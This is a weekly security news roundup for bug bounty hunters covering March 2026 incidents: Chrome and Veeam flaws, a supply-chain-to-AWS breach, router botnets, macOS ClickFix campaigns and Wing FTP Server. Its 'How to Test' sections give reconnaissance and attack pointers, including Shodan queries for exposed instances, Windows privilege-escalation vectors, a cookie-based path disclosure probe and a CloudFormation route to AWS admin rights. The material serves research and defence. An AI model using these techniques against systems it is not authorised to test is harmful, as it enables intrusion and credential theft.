Security Roundup March 9–16, 2026: Chrome Zero-Days, Veeam Mass RCE & Supply Chain AWS Breach

1. 🔴 CVE-2026-3909 & CVE-2026-3910: Chrome 0-Days Actively Exploited

What Happened

Google issued an emergency update for Chrome on March 11 to patch two high-severity vulnerabilities that it confirmed have active in-the-wild exploits. The week's most urgent patch covers:

• CVE-2026-3909 — Out-of-bounds write in the Skia 2D graphics rendering library. Skia processes all visual rendering in Chrome — images, SVGs, CSS gradients, canvas operations. An OOB write in Skia is typically exploitable to achieve code execution within the renderer sandbox, serving as the first stage in a browser exploit chain.
• CVE-2026-3910 — Inappropriate implementation in V8, Chrome's JavaScript and WebAssembly engine. V8 misimplementation bugs frequently result in out-of-bounds memory access or type confusion, enabling attackers to escape the renderer process or corrupt memory in ways that lead to code execution.

A third flaw, CVE-2026-3913, was patched in the same release — a different Skia issue, though this one was not marked as actively exploited at time of publication.

Google declined to share technical details or attribution for CVE-2026-3909 and CVE-2026-3910, which is standard practice while the majority of users are still patching. Both flaws are being actively exploited, meaning there is a working exploit in circulation before most users updated.

Why It Matters for Bug Hunters

Chrome zero-days are among the highest-value findings in the security research community — and among the most carefully defended targets. Google's Project Zero team, the Chrome Vulnerability Rewards Programme, and a large external research community make Chrome one of the most hardened applications in existence. When two zero-days land in the same emergency patch, it's notable.

For bug hunters, the Skia and V8 attack surfaces are both deep and heavily researched:

• Skia is not just Chrome — it's also used in Android, Flutter, and Google products. Finding a class-similar bug in Skia affects a much broader attack surface than just the browser. Google's Vulnerability Reward Programme covers Skia bugs in Chrome and Android separately, and Android Skia bugs can command higher payouts due to broader impact.
• V8 bugs are perennially valuable — V8 is also the JavaScript engine powering Node.js, Electron apps, and CloudFlare Workers. A V8 bug in Chrome may have sibling impact across the Node.js and server-side JavaScript ecosystem. Past V8 disclosures have paid $15,000–$30,000 in Chrome VRP, with additional rewards for Electron or Node.js impact.

The most accessible entry point for Chrome security research is fuzzing. Google itself runs Clusterfuzz continuously against Chrome and publishes the ClusterFuzz framework as open source. Running targeted fuzzers against Skia (especially SVG and canvas paths) or V8 (particularly Wasm GC and JIT paths) remains a viable strategy for independent researchers, and the barrier is lower than it appears.

Source: The Hacker News — Google Fixes Two Chrome Zero-Days, March 11, 2026

2. 🔴 Veeam Backup & Replication: 7 Critical CVEs, Five Rated CVSS 9.9

What Happened

Veeam released emergency security updates this week covering seven critical vulnerabilities across Veeam Backup & Replication — the most concentrated single advisory in the product's history. The full list:

• CVE-2026-21666 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server
• CVE-2026-21667 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server (separate code path)
• CVE-2026-21668 (CVSS 8.8) — Authenticated domain user → arbitrary file manipulation on Backup Repository
• CVE-2026-21672 (CVSS 8.8) — Local privilege escalation on Windows-based Veeam servers
• CVE-2026-21708 (CVSS 9.9) — Backup Viewer role → RCE as the PostgreSQL process user
• CVE-2026-21669 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server (fixed in v13 only)
• CVE-2026-21671 (CVSS 9.1) — Backup Administrator → RCE in high-availability Veeam deployments

The first five affect Veeam Backup & Replication 12.3.2.4165 and all earlier version 12 builds, patched in version 12.3.2.4465. The remaining two affect version 13 branch and are fixed in version 13.0.1.2067. Veeam explicitly warned: "Once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments."

This warning deserves emphasis. Veeam has the worst track record of any enterprise backup vendor for post-disclosure exploitation timelines. CVE-2023-27532, CVE-2024-40711, and CVE-2025-23120 were all weaponised by ransomware groups within days to weeks of patch disclosure. The pattern is consistent: attackers diff the patch, build an exploit, and scan for vulnerable instances before the majority of organisations have patched.

Why It Matters for Bug Hunters

Backup infrastructure is one of the most critical attack targets in enterprise environments. Compromising a backup server gives an attacker access to backup data (which contains copies of everything), the ability to destroy backups (making ransomware recovery impossible), and often privileged credentials for the rest of the infrastructure.

The attack paths here are notable:

• CVE-2026-21708 requires only Backup Viewer role — the most basic read-only access level in Veeam. This is a particularly dangerous escalation path: a low-privilege service account for backup verification can translate to code execution as the database process user.
• The "authenticated domain user" requirement for CVEs 21666/21667/21669 sounds restrictive but isn't in practice — most organisations have broad Active Directory access, and a single compromised domain account (via phishing, credential stuffing, or infostealer logs) is sufficient.
• CVE-2026-21671 targeting HA deployments is particularly interesting — organisations that deployed HA for resilience have a higher-severity exposure than single-server installs.

For bug bounty researchers, Veeam has a well-established vulnerability disclosure programme. RCE findings in Veeam Backup products consistently result in paid disclosures. Given the complexity of the codebase and Veeam's history, there are almost certainly additional undiscovered vulnerabilities in adjacent code paths to the ones patched this week.

How to Test

• Veeam Backup Server typically listens on TCP 9392 (REST API) and 9401/9395. The management console is accessible via HTTPS on these ports.
• Enumerate endpoints at /api/v1/ — Veeam's REST API has had authentication issues in multiple previous versions. Test with minimal credentials for privilege escalation paths.
• The PostgreSQL angle (CVE-2026-21708) suggests the backup viewer role has excessive database access. Look for other roles that interact with the Postgres backend unexpectedly.
• For CVE-2026-21672 (LPE): Veeam services run as SYSTEM on Windows. Test for writable directories in the Veeam install path, DLL search order hijacking in service processes, and named pipe impersonation — all common LPE vectors in Windows services.
• Check whether your target exposes Veeam on internet-facing IPs via Shodan: product:"Veeam" or port-based fingerprinting on 9392.

Source: The Hacker News — Veeam Patches 7 Critical Backup & Replication Flaws, March 12, 2026

3. 🔴 UNC6426: Stale Supply Chain Keys → Full AWS Admin Access in 72 Hours

What Happened

Google's Cloud Threat Horizons Report for H1 2026 revealed the full attack chain behind one of the most technically sophisticated cloud breaches of the year so far — and the initial entry point was a poisoned npm package from eight months earlier.

Here's the complete attack timeline:

1. August 2025 — Supply chain compromise: Unknown threat actors exploited a vulnerable pull_request_target GitHub Actions workflow in the nx npm package (the popular Nrwl/Nx monorepo tooling framework). This "Pwn Request" attack allowed them to push trojanised versions of nx to the npm registry, embedding a postinstall script that dropped a JavaScript credential stealer named QUIETVAULT.
2. QUIETVAULT used a legitimate LLM coding tool already installed on victim machines to scan the local filesystem for sensitive data — environment variables, GitHub Personal Access Tokens (PATs), AWS credentials, and API keys — then uploaded everything to a public GitHub repository.
3. March 2026 — Delayed exploitation: UNC6426 obtained a stolen GitHub PAT harvested months earlier when a developer at the victim organisation triggered an Nx Console extension update that pulled the malicious package. Using Nord Stream (an open-source CI/CD secret extraction tool), UNC6426 pivoted from the GitHub PAT to a service account with broader permissions.
4. OIDC abuse: The service account had permission to trigger GitHub Actions workflows. UNC6426 used the --aws-role parameter in Nord Stream to generate temporary AWS STS tokens through the GitHub-to-AWS OpenID Connect trust relationship — a legitimate integration mechanism that was dramatically over-permissioned.
5. Full admin escalation: The compromised Actions-CloudFormation role had CAPABILITY_NAMED_IAM permissions. UNC6426 deployed a new CloudFormation stack whose sole purpose was to create a new IAM role and attach arn:aws:iam::aws:policy/AdministratorAccess — achieving full AWS administrator access in under 72 hours from initial pivot.
6. Destruction and exfiltration: The attacker enumerated and exfiltrated S3 buckets, terminated production EC2 and RDS instances, decrypted application keys, renamed all internal GitHub repositories to /s1ngularity-repository-[random], and made them public.

Why It Matters for Bug Hunters

This attack chain is a masterclass in how supply chain compromises generate long-tail risk. The initial infection happened in August 2025. Exploitation happened in March 2026. Seven months passed between a developer pulling a malicious package and an attacker using the harvested tokens to destroy a production environment.

Several vulnerability classes converge in this story — each individually worth pursuing in bug bounty programmes:

• Pwn Request / pull_request_target misuse: This GitHub Actions misconfiguration is widespread. The pull_request_target trigger runs with write permissions to the target repository and can access secrets — yet it's frequently misconfigured to execute code from PRs by untrusted contributors. Hunt for this pattern in public repos belonging to large organisations with bug bounty programmes. GitHub Security Lab's research provides a solid methodology.
• OIDC trust misconfiguration: GitHub-to-AWS OIDC trust relationships are increasingly common but frequently over-permissioned. If an IAM role trusts any branch or any repo in an organisation, a compromised GitHub account can obtain cloud credentials. Testing OIDC trust scope (which repos, which branches, which Actions) is a valid cloud security bug class on many programmes.
• CloudFormation privilege escalation: The CAPABILITY_NAMED_IAM permission is a well-documented escalation path. If an IAM role can deploy CloudFormation stacks with IAM capabilities, it can create a new privileged role — regardless of its own permission set. This is a known AWS privilege escalation technique covered in Rhino Security Labs' AWS privilege escalation research.

Source: The Hacker News — UNC6426 Exploits nx npm Supply Chain Attack, March 12, 2026

4. 🟠 SocksEscort Dismantled, KadNap Moves In: The Endless Router Botnet Cycle

What Happened

Two related stories this week paint a complete picture of the residential proxy botnet ecosystem.

SocksEscort takedown: A court-authorised international law enforcement operation dismantled the SocksEscort criminal proxy service — a residential proxy network that had enslaved thousands of home routers into a botnet that sold anonymised internet traffic to cybercriminals for large-scale fraud. SocksEscort was powered by AVrecon, a C-written malware targeting MIPS and ARM architectures that exploited known security flaws in SOHO (small office/home office) routers. The malware's persistence mechanism was particularly nasty: it flashed custom firmware to infected devices that deliberately disabled future OEM updates, permanently converting routers into proxy nodes that would survive reboots and survive vendor patches.

KadNap fills the gap: Almost simultaneously with the SocksEscort takedown, researchers detailed an active router botnet named KadNap comprising more than 14,000 compromised network devices — primarily Asus routers — that fuel an illegal proxy service called Doppelganger. Unlike SocksEscort's centralised infrastructure (making it takedown-vulnerable), KadNap uses a peer-to-peer network based on the Kademlia distributed hash table protocol for decentralised command-and-control. This design makes it significantly more resilient to law enforcement operations. Infected devices tunnel customers' internet traffic through residential IP addresses, offering threat actors cover for fraudulent and malicious activity.

Why It Matters for Bug Hunters

Router botnets are a perennial problem with deep implications for security researchers:

For vulnerability researchers: AVrecon and KadNap both exploit "known security flaws" in SOHO routers — CVEs that exist, have patches available, but are almost never applied by residential users. This means the vulnerability research pipeline is healthy, but the patch-application pipeline is broken. If you discover a new vulnerability in a popular consumer router (Asus, TP-Link, Netgear, D-Link), the attack surface is enormous — millions of unpatched devices persist for years.

For cloud/enterprise bug hunters: Residential proxy services like SocksEscort and Doppelganger are the mechanism behind much of the credential stuffing, account takeover, and fraud activity that web applications face. Understanding how these services work helps you design better fraud detection — and helps you understand why IP-based blocking is insufficient as a primary security control.

For IoT/embedded security researchers: The AVrecon firmware-flashing persistence technique is notable. Malware that defeats OEM updates by flashing custom firmware represents a new persistence class for embedded devices. Testing whether your target device has signed firmware verification, secure boot, or integrity checking is a valuable research direction — and many consumer devices fail this test.

How to Test Router Security

• Check for exposed router admin interfaces: Shodan searches for common router admin pages (title:"ASUS Router", title:"TP-LINK") find millions of exposed devices
• Test for authentication bypass in the router's web management interface — many SOHO routers have had auth bypass bugs in their CGI-based admin panels
• Review UPnP exposure: many routers auto-forward ports via UPnP without authentication, enabling direct access to internal services
• Test for command injection in the diagnostic tools (ping, traceroute, nslookup) that most router admin interfaces expose — this class of bug is endemic in SOHO firmware
• Verify firmware update integrity: does the router validate firmware signatures before flashing? Testing this on lab hardware reveals whether the device is vulnerable to the AVrecon persistence technique

Sources: The Hacker News — Authorities Disrupt SocksEscort | The Hacker News — KadNap Malware Infects 14,000 Edge Devices

5. 🟠 ClickFix Goes Cross-Platform: MacSync Infostealer Hits macOS via Three Campaigns

What Happened

Sophos researchers published an analysis of three ClickFix campaigns delivering a new macOS infostealer named MacSync — marking ClickFix's clear expansion beyond its Windows PowerShell origins into macOS terminal command injection. The technique is conceptually identical but adapted for the macOS environment: instead of convincing users to paste malicious commands into a Windows Run dialog, the campaigns direct macOS users to open Terminal and paste malicious shell commands.

The three campaigns documented by Sophos:

1. November 2025 — OpenAI Atlas browser lure: Fake sponsored search results on Google directed users to a fake Google Sites page offering an "OpenAI Atlas browser" download. Instead of a download, the page displayed a fake error with Terminal commands to "fix" the installation. The commands installed MacSync.
2. January 2026 — Fake CAPTCHA lure: A campaign using fake CAPTCHA verification pages that asked users to "verify they are human" by opening Terminal and pasting a provided command. The CAPTCHA aesthetic was designed to match familiar verification flows, reducing suspicion.
3. February 2026 — Fake browser extension lure: A campaign impersonating a popular browser extension installer, again using the Terminal command injection pattern to deliver MacSync.

MacSync exfiltrates browser cookies, saved passwords, autofill data, cryptocurrency wallet files, and document files matching high-value extensions. The Jamf Threat Labs team had flagged earlier ClickFix-to-macOS campaigns in December 2025, but Sophos' research provides the most complete picture of how the technique has matured.

Why It Matters for Bug Hunters

ClickFix is doing something strategically significant: it's routing around technical exploitation entirely. There's no CVE needed. No browser vulnerability, no macOS sandbox escape. The "vulnerability" is the user's reasonable assumption that copying instructions from an apparently legitimate page is safe.

Several implications for security professionals:

• macOS users are not safer by default: The security research community skews heavily macOS. If you're reading this, you're probably at higher risk from MacSync campaigns than the average user — because these campaigns specifically target developers and technical users who are comfortable with Terminal.
• Platform-specific detection gaps: macOS EDR coverage is weaker than Windows. Many organisations deploy Windows-focused endpoint detection and have lighter (or no) coverage on macOS machines. If you're doing detection engineering, test whether your macOS endpoint monitoring catches shell commands pasted directly into Terminal by a user (vs. executed from a script).
• The "legitimate tool" lure evolves: The fake AI tool installer pattern is expanding. Claude Code, OpenAI tools, Nx (from the supply chain story), and now "OpenAI Atlas" have all been used as lures. If you use AI developer tooling, verify every installation source against official documentation.
• Affiliate and advertising platform abuse: The first campaign used Google's sponsored search results. This is a detection and prevention gap worth investigating — advertising platforms that allow impersonation of technology products are an ongoing vector. Google, Meta, and Microsoft all have bug bounty / policy violation reporting mechanisms for ad abuse.

Source: The Hacker News — ClickFix Campaigns Spread MacSync macOS Infostealer, March 16, 2026

6. 🟠 CVE-2025-47813: Wing FTP Server Joins CISA KEV — RCE Chain Goes Public

What Happened

CISA added CVE-2025-47813 to its Known Exploited Vulnerabilities catalogue on March 16, giving Federal Civilian Executive Branch agencies two weeks to patch. The flaw is a path disclosure vulnerability in Wing FTP Server — when a long value is sent in the UID cookie, the server returns an error message revealing the full local installation path.

Individually, a path disclosure sounds low severity. The problem is the chain: security researcher Julien Ahrens discovered and reported three Wing FTP Server vulnerabilities simultaneously:

• CVE-2025-47813 — Information disclosure (installation path via UID cookie error)
• CVE-2025-47812 — Critical RCE (previously confirmed exploited in the wild; one day after PoC publication, active exploitation began)
• CVE-2025-27889 — Password theft via information disclosure

The path disclosure in CVE-2025-47813 is being exploited as part of the same chain as the RCE in CVE-2025-47812. Ahrens published proof-of-concept code for CVE-2025-47813 in June 2025, explicitly noting the chain potential. Now, eight months later, CISA is confirming it's being actively used.

Wing FTP Server's customer base — US Air Force, Sony, Airbus, Reuters, Sephora — makes this a high-impact KEV addition despite the relatively lower profile of the product compared to enterprise platforms.

Why It Matters for Bug Hunters

The Wing FTP Server story is a case study in vulnerability chaining — individually low-severity findings combined into critical exploitation paths:

• Error messages as intelligence: The UID cookie disclosure reveals the installation path — which tells an attacker the exact file system layout, whether the server runs as a standard or custom install, and enables path-dependent exploit payloads. Information disclosure bugs are frequently dismissed as low severity and left unpatched, creating exactly these chain opportunities.
• File transfer software as attack surface: FTP/SFTP servers often run with elevated privileges (to bind low ports and access files across the filesystem), are frequently internet-exposed, and are often undermanaged. Wing FTP Server, Serv-U, FileZilla Server, and similar products are worth including in your target portfolio — they have rich vulnerability histories and are underresearched compared to web applications.
• The disclosure-to-exploitation gap: PoC published June 2025, first exploitation observed shortly after, CISA KEV added March 2026. Almost nine months of active exploitation before a federal mandate to patch. This gap is representative — expect similar windows for Veeam this week.

How to Test

• Wing FTP Server exposes a web-based admin interface (typically port 5466) and a client-facing HTTPS interface (port 443 or 8443)
• Test the UID cookie disclosure: send a request with an oversized UID cookie value and examine the error response for file system path information
• Shodan fingerprinting: search for Wing FTP Server login pages to find exposed instances
• For the RCE chain: once the path is disclosed, CVE-2025-47812 requires constructing a payload that exploits the specific RCE vector using the resolved path — refer to Ahrens' published advisory for details
• Check for CVE-2025-27889 independently: the password theft disclosure may work without needing the full RCE chain and is useful for credential harvest even if the RCE is patched

Sources: BleepingComputer — CISA Flags Wing FTP Server Flaw, March 16, 2026

⚡ Bonus: APT28 Deploys BEARDSHELL + COVENANT Toolkit Against Ukraine

Russia's APT28 (Forest Blizzard / STRONTIUM / Fancy Bear) surfaced this week with a bespoke two-implant toolkit targeting Ukrainian cyber assets. The campaign uses BEARDSHELL — a malware family that borrows techniques from APT28's own tooling circa the 2010s — alongside a heavily modified version of the COVENANT C2 framework originally developed for legitimate red team use.

COVENANT provides APT28 with long-term persistence, lateral movement, PowerShell execution, and data exfiltration. A third component, SLIMAGENT, shares code overlaps with XAgent — APT28's long-running espionage implant tied to the 2016 DNC breach and numerous other campaigns over a decade of operations.

For bug hunters and defenders: The reuse of COVENANT (a legitimate red team framework) as a nation-state C2 platform creates a detection challenge. Defenders who have COVENANT YARA or network signatures tuned to detect red team engagements may correctly flag C2 traffic — but now they need to distinguish authorised red team exercises from APT28 intrusions. Review your C2 framework detection logic and ensure it correlates with authorised engagement calendars. Any COVENANT/Cobalt Strike/Sliver traffic outside scheduled assessments warrants immediate investigation.

Source: The Hacker News — APT28 Uses BEARDSHELL and COVENANT, March 14, 2026

🛠️ Essential Tools This Week

This week's findings span browser security, backup infrastructure exploitation, CI/CD and cloud access control testing, and macOS threat research. Here are five tools that map directly to what we covered:

📚 Books to Go Deeper

This week's findings span browser internals, enterprise backup exploitation, cloud CI/CD security, and embedded device research. Four books to level up across those domains:

🎯 Recommendations for Bug Hunters This Week

1. Patch Chrome Before Hunting Anything Else

Both CVE-2026-3909 and CVE-2026-3910 have active exploits. If your research machine isn't on Chrome 146.0.7680.75+, you're operating with a known-compromised browser. Check chrome://settings/help and update immediately. This applies to any Chrome-based browser (Edge, Brave, Arc) — they all ship Skia and V8 and are similarly affected until updated.

2. Map Exposed Veeam Instances in Your Target Scope

Seven critical CVEs in a product with a documented history of rapid post-disclosure exploitation means there will be vulnerable instances in the wild within days. If any of your bug bounty targets run Veeam Backup & Replication and it's in scope, now is the time to check version numbers. The CVSS 9.9 findings requiring only authenticated domain user access are particularly tractable — if you have any internal user credentials through your reconnaissance process, Veeam RCE may be reachable.

3. Audit Your CI/CD for OIDC Trust Scope and Pwn Request Vectors

The UNC6426 breach is a wake-up call for supply chain and CI/CD security. If you do application-layer bug hunting, add these to your reconnaissance checklist: search target GitHub organisations for workflows using pull_request_target, check whether their GitHub-to-cloud OIDC trust scopes are wildcarded, and review what IAM permissions their Actions roles carry. Each of these is a reportable finding if misconfigured — and the UNC6426 case shows exactly what the impact looks like when all three fail simultaneously.

4. Research FTP and File Transfer Software

Wing FTP Server is a reminder that legacy file transfer software is an underserved research area. Serv-U, FileZilla Server, JSCAPE MFT, and similar products are widely deployed in enterprise environments, often internet-facing, frequently under-patched, and underrepresented in bug bounty research. If you're looking for a high-value, low-competition research niche, enterprise file transfer software deserves a serious look.

5. Add macOS to Your Threat Model (Especially for OpSec)

ClickFix expanding to macOS via MacSync means security researchers operating on macOS are now explicitly targeted. Review what's installed on your research machines, audit Terminal command history for any unexpected entries, check your browser's saved credentials, and verify that your cryptocurrency wallet files haven't been accessed. Enable full-disk encryption, deploy an endpoint security product, and treat macOS with the same paranoia you'd apply to a Windows machine in a hostile environment.

Conclusion: Attack Chains Are Getting Longer and Quieter

The week of March 9–16 demonstrates a recurring theme in 2026 security: the most impactful compromises aren't the loudest ones. The UNC6426 breach started eight months before anyone noticed. Wing FTP Server's chain worked quietly for the better part of a year. The MacSync campaigns have been running since November 2025.

For bug hunters, this creates a counterintuitive lesson: the most valuable findings are often the ones that work slowly. A supply chain vector that silently harvests tokens for months before anyone uses them. An information disclosure bug that enables a critical RCE chain only when combined with another finding. A OIDC trust misconfiguration that's harmless until someone's token gets stolen.

These aren't the showstopper CVSSv3 10.0 findings that make headlines. They're the quiet, combinable issues that define real-world breach paths. And they're the findings that most automated scanners and AI-powered tools miss entirely — because they require understanding context, relationships, and what an attacker does after initial access.

The Chrome zero-days are urgent and important. Patch Veeam before ransomware groups weaponise the PoC. But the longer-term opportunity for researchers in 2026 is in finding these multi-stage, slow-burn attack paths — and that requires the kind of patient, contextual analysis that can't be automated.

Stay sharp, stay curious, and happy hunting.

📅 Previous Weekly Roundups

• Security Roundup March 2–9, 2026 — Cisco SD-WAN CVSS 10.0, VMware Aria CISA KEV, APT28 MSHTML 0-day, AI vibeware factories, ClickFix CastleRAT
• Security Roundup February 10–16, 2026 — vLLM CVSS 9.8 RCE, n8n six-CVE disclosure, AI-assisted AWS breach